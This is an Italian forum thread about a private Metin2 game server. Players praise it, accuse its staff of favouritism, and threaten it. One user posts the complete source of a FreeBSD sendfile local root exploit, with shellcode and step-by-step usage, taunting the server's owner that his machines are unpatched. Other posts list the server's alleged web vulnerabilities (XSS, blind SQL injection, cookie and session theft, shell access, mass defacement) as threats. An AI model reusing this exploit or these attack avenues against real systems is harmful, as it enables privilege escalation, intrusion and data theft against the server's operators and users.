*-* *-* *-* [DEDICATO ]Imperium-MMORPG - The Name Of Legend Riapertura Server Old-Style *-* *-* *-*
- Stato
OoKillerDiegooO
Utente Silver
Ti ringrazio del complimentoNon vorrei criticare il titolo del topic ma vorrei farvi una domanda...
Quando scrivete paroli in inglese, sapete almeno cosa significano?
No perchè: t[DEDICATO ]Imperium-MMORPG - The Name Of Legend Riapertura Server Old-Style *-* *-* *-*
Tradotto: [DEDICATO ]Imperium-MMORPG - Il Nome Di Leggenda (Capitan Ovvio) Riapertura Server Old-Style *-* *-* *-*
Del resto, bel server.
per la la frase " the name of legend" intendevamo il nome della leggenda ( the name of the legend) adesso correggeremo la frase
grazie per avercelo fatto notare
Heaven Aka SafeThy
Utente Electrum
Ultima modifica:
Caro diego come mai questo root exploit funziona?
Codice:
[FONT=book antiqua][COLOR=#ff0000][U]Per diego :) - Root Exploit FreeBSD 7.8 - Che il suo staff imperiumNoobs non hanno fixato :)[/U][/COLOR][/FONT]
PHP:
/*
freebsd mbufs() sendfile cache poisoning-priv escalation
x86/x64 local root xpl v2 by Kingcope
2010
--
tested on: 8.1-RC1, 8.0-RELEASE, 7.3-RELEASE and
7.2-RELEASE-p8 (xd personally did 7.2 test)
poisons /bin/sh to contain shellcode which does this...
'
chmod a+s /tmp/sh
chown root /tmp/sh
execve /tmp/sh2
'
how to use ths is VERY important it is NOT your standard type,
DONT start a listener as normal...let this do its shit..
and then again, there is a MUCH simpler way you could redo
this exploit but, thats for you to find ;) -xd
box 1 (TARGET):
$ cp /bin/sh /tmp/sh
$ cp /bin/sh /tmp/sh2
$ gcc cache.c -o cache
box 2 (LISTENER):
$ nc -l 7030
on box 1 do:
for i386 type:
$ ./cache 1
for amd64 type:
$ ./cache 2
ok now lets hope this worked and injected the shellcode,should,
/bin/sh should be execed by the system as root in ~5 mins if lucky :)
NOW DO:
$ /tmp/sh
AND cleanup:
# cp -f /tmp/sh2 /bin/sh
enjoy the root shell!
*/
// this juarez is now private on #darknet
// http://www.youtube.com/watch?v=JtgInqNNpCI
// http://www.youtube.com/watch?v=IdbRWrY4QBI
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <sys/select.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <string.h>
#include <err.h>
main (int argc, char *argv[]) {
int s, f, k2;
struct sockaddr_in addr;
int flags;
char str32[]=
"\x31\xc0\x6a\x00\x68\x70\x2f\x73\x68\x68\x2f\x2f\x74\x6d\x89\xe3"
"\x50\x50\x53\xb0\x10\x50\xcd\x80\x68\xed\x0d\x00\x00\x53\xb0\x0f"
"\x50\xcd\x80\x31\xc0\x6a\x00\x68\x2f\x73\x68\x32\x68\x2f\x74\x6d"
"\x70\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80";
char str64[]=
"\x48\x31\xc0\x99\xb0\x10\x48\xbf\xff\x2f\x74\x6d\x70\x2f\x73\x68"
"\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05"
"\xb0\x0f\x48\x31\xf6\x66\xbe\xed\x0d\x0f\x05\x48\x31\xc0\x99\xb0"
"\x3b\x48\xbf\x2f\x74\x6d\x70\x2f\x73\x68\x32\x6a\x00\x57\x48\x89"
"\xe7\x57\x52\x48\x89\xe6\x0f\x05";
char buf[10000];
char *p;
struct stat sb;
int n;
fd_set wset;
int64_t size;
off_t sbytes;
off_t sent = 0;
int chunk;
int arch = 3;
if (argc != 2) {
printf("[+] Define architecture i386 or amd64 (1/2)\n");
return;
}
if (strcmp(argv[1], "1") == 0)
arch=1;
if (strcmp(argv[1], "2") == 0)
arch=2;
if (arch == 3) {
printf("[+] Define architecture i386 or amd64 (1/2)\n");
return;
}
s = socket(AF_INET, SOCK_STREAM, 0);
bzero(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(7030);
addr.sin_addr.s_addr = inet_addr("127.0.0.1");
n = connect(s, (struct sockaddr *)&addr, sizeof (addr));
if (n < 0)
warn ("[-] Failed to connect");
f = open("/bin/sh", O_RDONLY);
if (f<0)
warn("[-] Failed to open file");
n = fstat(f, &sb);
if (n<0)
warn("[-] fstat failed");
size = sb.st_size;
chunk = 0;
flags = fcntl(f, F_GETFL);
flags |= O_NONBLOCK;
fcntl(f, F_SETFL, flags);
while (size > 0) {
FD_ZERO(&wset);
FD_SET(s, &wset);
n = select(f+1, NULL, &wset, NULL, NULL);
if (n < 0)
continue;
if (chunk > 0) {
sbytes = 0;
if (arch == 1)
n = sendfile(f, s, 2048*2, chunk, NULL, &sbytes,0);
if (arch == 2)
n = sendfile(f, s, 1204*6, chunk, NULL, &sbytes,0);
if (n < 0)
continue;
chunk -= sbytes;
size -= sbytes;
sent += sbytes;
continue;
}
chunk = 2048;
memset(buf, '\0', sizeof buf);
if (arch == 1) {
for (k2=0;k2<256;k2++) {
buf[k2] = 0x90;
}
p = buf;
p = p + k2;
memcpy(p, str32, sizeof str32);
n = k2 + sizeof str32;
p = buf;
}
if (arch == 2) {
for (k2=0;k2<100;k2++) {
buf[k2] = 0x90;
}
p = buf;
p = p + k2;
memcpy(p, str64, sizeof str64);
n = k2 + sizeof str64;
p = buf;
}
write(s, p, n);
}
}Heaven Aka SafeThy
Utente Electrum
dimostro che con un dito (senza volere) imperium cade 
stavo per scaricarlo ma vado a vedere l'item shop e...
[TABLE="width: 95%"]
[TR]
[TD]1kkk Yang[/TD]
[TD]1[/TD]
[TD]7€[/TD]
[/TR]
[/TABLE]
._. immagino anche che ci siano le shamy trans che si fanno moddare dal gf gratis in stile guido78 di starlonjut merdin2
[TABLE="width: 95%"]
[TR]
[TD]1kkk Yang[/TD]
[TD]1[/TD]
[TD]7€[/TD]
[/TR]
[/TABLE]
._. immagino anche che ci siano le shamy trans che si fanno moddare dal gf gratis in stile guido78 di starlonjut merdin2
MrGinoPowa™
Utente Emerald
Ultima modifica:
sono appena tornato... non avendo niente da fare ho controllato un pò il dominio di imperium e risalgono numerosi bug ovviamente non posterò il fix.
Ecco queste sono le vulnerabilità del dominio di imperium-mmorpg
-Apache Buffer Overflow un lamerotto malintenzionato potrebbere con exploit adatto sfruttarare questa vulnerabilità per causare un denial of serverice (DoS). Non escluso l'esecuzioni di codici arbitrari per garantirsi l'accesso (possibile ma non sicuro).
Cross Scripting vulnerabilità alla board altissima di grado 10/10 path board/newreply.php non escludo che si possano risalire ai dati del dominio tramite dei cookie o alle sessioni o all' utente amministratore della board tanto peggio sarebbe possibile la modifica completa del dominio tramite una shell
Ecco queste sono le vulnerabilità del dominio di imperium-mmorpg
-Apache Buffer Overflow un lamerotto malintenzionato potrebbere con exploit adatto sfruttarare questa vulnerabilità per causare un denial of serverice (DoS). Non escluso l'esecuzioni di codici arbitrari per garantirsi l'accesso (possibile ma non sicuro).
Cross Scripting vulnerabilità alla board altissima di grado 10/10 path board/newreply.php non escludo che si possano risalire ai dati del dominio tramite dei cookie o alle sessioni o all' utente amministratore della board tanto peggio sarebbe possibile la modifica completa del dominio tramite una shell
Mr.MonteNegrO
Utente Jade
local root xpl
VUOLE SPACCIARE UN LOCAL EXPLOIT X NN SO MANCO LUI COSA
VUOLE SPACCIARE UN LOCAL EXPLOIT X NN SO MANCO LUI COSA
Heaven Aka SafeThy
Utente Electrum
Ecco le vulnerabilita possibili (quoto gino) :
1. Apache Buffer Overflow. (BOARD)
2. XSS & BLIND SQL INJECTION. (BOARD)
3. Sessioni e Cookie buggate. Una bella shell e i dati del dominio sono del lamer. (BOARD)
4. Mass Deface (BOARD)
Saluti a diego
1. Apache Buffer Overflow. (BOARD)
2. XSS & BLIND SQL INJECTION. (BOARD)
3. Sessioni e Cookie buggate. Una bella shell e i dati del dominio sono del lamer. (BOARD)
4. Mass Deface (BOARD)
Saluti a diego
Heaven Aka SafeThy
Utente Electrum
Monte quell'exploit non e mio ma di KINGCOPE!!!
Quindi non lo spaccio bensì lo ripeto "è di KingCope"
Quindi non lo spaccio bensì lo ripeto "è di KingCope"
MrGinoPowa™
Utente Emerald
Ecco le vulnerabilita possibili (quoto gino) :
1. Apache Buffer Overflow. (BOARD)
2. XSS & BLIND SQL INJECTION. (BOARD)
3. Sessioni e Cookie buggate. Una bella shell e i dati del dominio sono del lamer. (BOARD)
4. Mass Deface (BOARD)
Saluti a diego
il buffer funge sull' intero dominio...
OoKillerDiegooO
Utente Silver
Stò in game circa 8 ore al giorno aiuto e collaboro con tutti
organizzo minimo 4 eventi al giorno
e sono cordiale e simpatico con tutti
cosa devo fare di più ? ?
Mi sono registrato su questo forum solo per mettere una buona parola a favore di questo server.
Diego lo trovo sempre disponibile ad aiutarmi ecc ecc
Quindi vi chiedo di smetterla di minacciare piuttosto fatevi un server vostro , ma questo server mi piace
ps: le storie delle moddature sono tutte un fake non è assolutamente vero che ci sono i moddati
ci si becca in Game
M A R I O
Diego lo trovo sempre disponibile ad aiutarmi ecc ecc
Quindi vi chiedo di smetterla di minacciare piuttosto fatevi un server vostro , ma questo server mi piace
ps: le storie delle moddature sono tutte un fake non è assolutamente vero che ci sono i moddati
ci si becca in Game
M A R I O
ASdFaiL
Utente Silver
infatti io il server lo trovo divertente , scorrevole , GM disponibilissimi tant'è vero un giorno ke ne cercavo 1 mi ha fatto PVT *-* EPIC WIN cmq.... ve lo straconsiglio <.< ci sn persone serissime.......... se volete venire bn senno ciao <.< non commentate negativamente <.<
ae_NaZiSt_ae
Utente Silver
Tranquillo, state andando benissimo, il server è spettacolare, e a parte qualche cosina abbastanza equilibrato. Lascia perdere i falliti che criticano lo staff, a me il server piace, le persone che ci giocano anche, lo staff è serio, e sto benissimo così, quindi chi vuole giocare venga, chi non vuole non rompa le palle con minaccie e rosik.
Mi aggiungo ai commenti... voglio soltanto dire che è un ottimo server, lo consiglio vivamente... ci sono pochi bm in giro, tante persone simpatiche, ci si diverte molto... staff disponibile, un server abbastanza competitivo. Riguardo gli altri che criticano e stanno sempre a giudicare... fate meno chiacchiere, cambiate server, punto.
Angeloid Nymph
Utente Electrum
server ottimo consiglio vivamente
OoKillerDiegooO
Utente Silver
Grazie a tutti per i commenti
Ryuk aka Kazuko
Utente Electrum
abbiamo aggiunto nuovi set di scarpe ed elmi andate qui per maggiori informazioni Implementazione 28/08/11
Purtroppo devo commentare anche io..
E' stata aperta una discussione di "Smerding" per il server (mi limiterò a citare quello che vi è scritto, dato che non è molto lungo ).
Quello che ci trovate scritto è la pura verità. Questo server è bellissimo, e fin qui siamo tutti d' accordo.
Purtroppo come accade in molti altri server lo staff rovina il game.
Io mi sono trovato un pg bannato, senza NESSUN motivo, infatti mi è stato sbannato poco tempo dopo. Quando però ho contattato ( non ricordo se ryuk o diego ), una volta esposto il mio problema, il GM non mi ha più cagato. Dopo notevoli pressioni l' account è stato sbannato.
Ora, senza fare nomi, lo sanno tutti nel server ( chi gioca ) che ci sono i cocchi dei GM.
La prima, dopo aver ricevuto in dono una corazza HWANG ( non reperibile in gioco ) da un gm, ( quello che ha aperto la discussione di lamentela, ma non era colpa sua dato che diego era loggato col suo account ) non è stata bannata, ( il suo nome fa rima con Ninja ( con la pronuncia: Ningia ) )invece un' altro che, dicono, abbia ricevuto altri doni dal gm no.
I gm si sono giustificati: Ma lei ha ridato subito la hwang.. MA VA? ORA ME NE VADO IN GIRO CON UNA HWANG NON REPERIBILE IN GIOCO SENZA CHE NESSUNO MI DICE NIENTE ._.
e poi gli hanno chiesto se aveva roba moddata ._. Giustamente, uno che ha roba moddata, quando un gm glielo chiede risponde <<Si!! Io ho tutto l' equip moddato!!>> e dopo un suo no non hanno controllato nemmeno in db ..
L' altro invece, quello che è stato bannato, non ha ricevuto nessun item, quindi è normale che non li abbia restutuiti. GLi altri lo hanno diffamato, dicendo che era powa solo perchè aveva gli item regalatigli dal GM, ma lo sappiamo tutti che era powa MOLTO prima che il gm si mettesse a fare il regalatore ambulante :_:
Server bello, staff pessimo.
E' stata aperta una discussione di "Smerding" per il server (mi limiterò a citare quello che vi è scritto, dato che non è molto lungo ).
Codice:
[LIST=1]
[*][FONT=arial narrow][SIZE=3][COLOR=#000000]Siete online da diverse settimane con bug, crash delle mappe.[/COLOR][/SIZE][/FONT]
[*][FONT=arial narrow][SIZE=3][COLOR=#000000]Staff poco serio, [SGM]Alkanos che crede di denunciare un intera armata di persone, e si ritrova a giocare a metin2 a 30 anni.[/COLOR][/SIZE][/FONT]
[*][FONT=arial narrow][SIZE=3][COLOR=#000000][COMA]Diego che non fa niente, uccide i player, non ti fa girare i bonus, inventa fesserie sull'implementazione di nuovi oggetti anche se è un oldstyle.[/COLOR][/SIZE][/FONT]
[*][FONT=arial narrow][SIZE=3][COLOR=#000000]Tiziano è bello prendere la gente per i fondelli vero? "Noi di imperium mmorpg siamo protetti al 100% sappiamo tenere al sicuro i vostri dati" sè come no... Hanno un server worldstream di 4GB senza alcun protezione eccetto ipfw per la gm mode.[/COLOR][/SIZE][/FONT]
[*][FONT=arial narrow][SIZE=3][COLOR=#000000]Quindi evitate di spendere soldi e metterci impegno sul vostro pg. tanto si gioca un giorno si e uno no. (dato che il server viene sempre: hackerato, smerdato, chiuso perchè diego i soldi non li spende nel mantenere esso.)[/COLOR][/SIZE][/FONT]
[*][FONT=arial narrow][SIZE=3][COLOR=#000000]Oltretutto come EX staffer posso dirvi una sola cosa: lo staff fa complotti per cacciare coloro che lavorano, in più dopo aver creato anche il loro sito sono venuti qua su inforge supplicando i moderatori di farmi chiudere le discussioni dove postavo "la verita" e dico la VERITA sul loro inutile server.[/COLOR][/SIZE][/FONT]
[*][FONT=arial narrow][SIZE=3][COLOR=#000000]Dopo aver creato un sito che nemmeno avevano, pff il [GA]Ryuk entra nel database cambia la password al mio account e va girellando per il villo regalando item, insultando il server.(L'ho saputo grazie ad un mio amico che giocava e shoppava sul server, che ora non fa più.)[/COLOR][/SIZE][/FONT]
[*][FONT=arial narrow][SIZE=3][COLOR=#000000]Non vi siete chiesti perchè dopo aver aperto NeoLegend, MetinLove hanno aperto questo? Semplice per puro scopo di lucro dato che quei 2 server erano falliti. Infatti quando i server venivano chiusi inventavano pure fantasie di Anonymous che gli hackeravano il server, inserendo sul sito finti stemmi fatti con photoshop di hackers.[/COLOR][/SIZE][/FONT]
[/LIST][COLOR=#ff0000][SIZE=2][U]Fine spero avete capito di che staff stiamo parlando.Volevo solo mettervi in guardia non ho insultato nessuno, ho solo detto in alcune parole LA PURA VERITA DI QUEL SERVER che sta per chiudere.[/U][/SIZE][/COLOR]Purtroppo come accade in molti altri server lo staff rovina il game.
Io mi sono trovato un pg bannato, senza NESSUN motivo, infatti mi è stato sbannato poco tempo dopo. Quando però ho contattato ( non ricordo se ryuk o diego ), una volta esposto il mio problema, il GM non mi ha più cagato. Dopo notevoli pressioni l' account è stato sbannato.
Ora, senza fare nomi, lo sanno tutti nel server ( chi gioca ) che ci sono i cocchi dei GM.
La prima, dopo aver ricevuto in dono una corazza HWANG ( non reperibile in gioco ) da un gm, ( quello che ha aperto la discussione di lamentela, ma non era colpa sua dato che diego era loggato col suo account ) non è stata bannata, ( il suo nome fa rima con Ninja ( con la pronuncia: Ningia ) )invece un' altro che, dicono, abbia ricevuto altri doni dal gm no.
I gm si sono giustificati: Ma lei ha ridato subito la hwang.. MA VA? ORA ME NE VADO IN GIRO CON UNA HWANG NON REPERIBILE IN GIOCO SENZA CHE NESSUNO MI DICE NIENTE ._.
e poi gli hanno chiesto se aveva roba moddata ._. Giustamente, uno che ha roba moddata, quando un gm glielo chiede risponde <<Si!! Io ho tutto l' equip moddato!!>> e dopo un suo no non hanno controllato nemmeno in db ..
L' altro invece, quello che è stato bannato, non ha ricevuto nessun item, quindi è normale che non li abbia restutuiti. GLi altri lo hanno diffamato, dicendo che era powa solo perchè aveva gli item regalatigli dal GM, ma lo sappiamo tutti che era powa MOLTO prima che il gm si mettesse a fare il regalatore ambulante :_:
Server bello, staff pessimo.
Da precisare una cosa, MetinLove appartiene a Ginopowa e non a questa gente.
- Stato